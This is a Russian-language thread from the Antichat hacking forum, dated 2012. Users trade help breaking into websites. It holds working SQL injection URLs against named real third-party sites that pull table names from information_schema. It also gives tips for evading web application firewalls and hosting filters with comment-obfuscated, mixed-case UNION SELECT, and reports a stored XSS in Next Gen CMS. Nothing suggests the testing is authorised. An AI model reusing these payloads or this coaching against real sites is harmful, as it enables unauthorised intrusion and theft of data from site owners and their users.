ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.04.2012, 23:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Сообщение от None
Fatal error: Cannot use string offset as an array in /home/www/artwork/stroyprofi.ru/include/tree.inc on line 66
таки никак? раз идет проверка на то, какое значение ввожу, да?
|
|
|
|
13.04.2012, 02:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.
Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?
|
|
|
|
13.04.2012, 10:21
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от kise
kise said:
Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.
Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?
Там фильтруется не только `FROM`. У них реализуется на уровне веб-сервера или демона эта шляпа. Очень жесткий фильтр. Ищи места в коде сайта, где данные транскодируются, передаются нестандартными GPC массивами или прямые аплоады и прочие финты ушами. Прямая скуль весьма сомнительно что-что тут тебе даст.
|
|
|
13.04.2012, 14:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
http://www.xakep.ru/howto/53202/Kak-obojti-zacshity-Sweb-i-Peterhost-hostingov.htm
Нашел статью, но походу они начали и POST фильтровать...
------------
Кто какие знает уязвимости в Next Gen CMS?
|
|
|
|
13.04.2012, 17:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Сообщение от kise
kise said:
Кто какие знает уязвимости в Next Gen CMS?
: Next Gen CMS
Версия: 0.9.3 Release [SVN880+FIX01] (Последняя на данный момент)
Уязвимость: XSS Активные
При добавлении новости
Уязвимы поля: " Заголовок", ' тестовый блог
Требуются права модератора или администратора
() mix0x0
|
|
|
|
13.04.2012, 23:05
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Фильтр при запросе union select.Можно ли как то обойти?
|
|
|
|
14.04.2012, 00:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
такой вопрос
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//good-life.kz/ru/cat.php?id=5'+and(select+1+from(select+count(*),concat((select+substr(concat_ws(0x3a,table_schema,table_name,table_rows),1,90)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+[/COLOR][/COLOR]
какова он мне выдаёт что возвращается больше одного результата ответа? как исправить? |
|
|
|
14.04.2012, 00:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
Code:
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+1,1),64),rand(0)|0)+having+avg(0)+or'
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+2,1),64),rand(0)|0)+having+avg(0)+or'
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+3,1),64),rand(0)|0)+having+avg(0)+or'
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+4,1),64),rand(0)|0)+having+avg(0)+or'
|
|
|
|
14.04.2012, 03:17
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от kingbeef
kingbeef said:
Фильтр при запросе union select.Можно ли как то обойти?
Можно.
1. Запостить сюда ссылку.
2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).
Для начало надо определить, что именно фильтруеться.
Просто UNION
Просто SELECT
Связка UNION SELECT
Ну и т.д...
А потом уже действовать.
UNION(SELECT(1),2,version(),(4))
UNION+/*!SELECT*/+1,2,version(),4
/*!UNION+SELECT*/+1,2,version(),4
Попробовать передать данные через POST
Регистр
Вместо пробелов(+) использовать другие символы
И т.д...
|
|
|
|
14.04.2012, 10:45
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
Можно.
1. Запостить сюда ссылку.
2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).
Для начало надо определить, что именно фильтруеться.
Просто UNION
Просто SELECT
Связка UNION SELECT
Ну и т.д...
А потом уже действовать.
UNION(SELECT(1),2,version(),(4))
UNION+/*!SELECT*/+1,2,version(),4
/*!UNION+SELECT*/+1,2,version(),4
Попробовать передать данные через POST
Регистр
Вместо пробелов(+) использовать другие символы
И т.д...
http://www.radimpex.rs/download.php?id=-1/*|UnIoN*//*|aLl*//*|SeLeCt*/1--&lang=en
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
